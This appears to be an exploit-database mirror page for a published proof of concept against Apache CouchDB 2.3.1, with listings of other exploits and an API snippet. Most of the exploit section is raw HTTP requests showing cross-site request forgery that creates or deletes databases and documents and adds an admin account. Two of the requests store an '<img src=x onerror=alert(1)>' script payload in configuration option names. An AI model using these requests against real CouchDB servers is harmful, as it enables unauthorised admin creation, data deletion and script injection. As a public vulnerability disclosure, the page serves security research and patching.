Menu

Improved exploit search engine. Try it out

"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting"

Author

"Ozer Goker"

Platform

multiple

Release date

2019-03-25

Release Date Title Type Platform Author
2019-06-18 "Sahi pro 8.x - Cross-Site Scripting" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 8.x - SQL Injection" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 7.x/8.x - Directory Traversal" webapps multiple "Goutham Madhwaraj"
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-28 "Phraseanet < 4.0.7 - Cross-Site Scripting" webapps multiple "Krzysztof Szulski"
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Deluge 1.3.15 - 'URL' Denial of Service (PoC)" dos multiple "Victor Mondragón"
2019-05-13 "Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-05-10 "CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection" webapps multiple "Marcelo Toran"
2019-05-10 "TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery" webapps multiple "Alexandre Basquin"
2019-05-07 "Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting" webapps multiple alt3kx
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-06 "ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution" webapps multiple "Gilson Camelo"
2019-05-03 "Zotonic < 0.47.0 mod_admin - Cross-Site Scripting" webapps multiple "Ramòn Janssen"
2019-04-30 "Domoticz 4.10577 - Unauthenticated Remote Command Execution" webapps multiple "Fabio Carretto"
Release Date Title Type Platform Author
2019-03-25 "Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-03-08 "OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "Comodo Dome Firewall 2.7.0 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-18 "Apache CouchDB 2.3.0 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-12 "OPNsense < 19.1.1 - Cross-Site Scripting" webapps php "Ozer Goker"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-04 "pfSense 2.4.4-p1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-04 "Nessus 8.2.1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-07 "phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Ozer Goker"
2017-01-13 "Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution" webapps linux "Ozer Goker"
2016-04-21 "phpLiteAdmin 1.9.6 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-14 "PHPmongoDB 1.0.0 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-11 "RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities" webapps php "Ozer Goker"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46595/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46595/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46595/41045/apache-couchdb-231-cross-site-request-forgery-cross-site-scripting/download/", "exploit_id": "46595", "exploit_description": "\"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting\"", "exploit_date": "2019-03-25", "exploit_author": "\"Ozer Goker\"", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################

Introduction

A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.

#################################################################################

Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored

#################################################################################

CSRF1

Create Database

PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"id":"test","name":"test"}

#################################################################################

CSRF2

Delete Database

DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################

CSRF3

Create Document

POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"testdoc":"test"}

#################################################################################

CSRF4

Create Admin

PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"password"


#################################################################################


CSRF5 & XSS1 | DOM Based & Stored - Add Option


PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"test"

#################################################################################

CSRF6 & XSS2 | DOM Based & Stored - Delete Option

DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################